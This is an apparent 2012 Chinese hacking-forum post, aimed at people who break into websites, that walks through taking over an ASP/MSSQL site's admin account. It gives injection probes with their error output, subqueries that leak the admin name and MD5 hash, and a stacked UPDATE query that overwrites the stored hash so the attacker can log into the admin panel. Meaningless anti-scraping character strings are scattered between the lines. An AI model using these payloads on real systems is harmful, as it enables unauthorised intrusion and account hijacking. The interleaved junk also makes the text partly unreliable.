中国网络渗透测试联盟
标题:
SQL注入直接修改管理员密码的MD5值
[打印本页]
作者:
admin
时间:
2012-9-13 17:55
标题:
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
( d. W; l1 L k) x+ z
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
2 ^) {$ |$ a; s' T: t/ ?
测试如下:
7 e0 T' X$ H( j5 V9 ]7 {
http://www.tmdsb.com/news.asp?id=121
4 W! _1 M2 V% q+ M) A* H' w; m7 `
在地址后输入单引号,显示
" t* g% C/ {7 Q: I& ^3 K5 P
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
/ |, M8 m- h( g3 e- D
字符串 ’’’ 之前有未闭合的引号
* I6 T' f$ ~$ j8 m: n2 x
/news/tmdws.asp,行63
. K; {9 r9 y4 d8 ^8 F/ I
说明没有过滤单引号且数据库是MSSQL.
, v- N( e; b, ]6 @; X2 {4 A8 B( i
and 1=1正常。and 1=2出错。肯定存在注入
/ |7 N6 g1 H9 E2 ~, o3 }& O
接着输入
7 E, N4 }) \/ y4 u/ W
http://www.tmdsb.com/news.asp?id=1
or admin_user in (select id from admin)
% \' @' B; N/ x: H
得到帐号为:admin
" J4 A" X1 G; C& j
http://www.tmdsb.com/news.asp?id=121
or admin_password in (select id from admin)
7 V/ b5 X' b& G# m6 q
得到密码为:a4716077c2ba075c
5 m- X. m+ g/ O; A0 C
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
$ B& K1 g# P2 z: V' s' T% @7 W( m
命令如下 :
: P1 {& s6 ^. `5 |0 O. U6 A" a: U
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
. T* o6 v) e. ^+ ?/ J) o
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
作者:
angel
时间:
2012-9-14 16:22
没法说 一个字牛
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2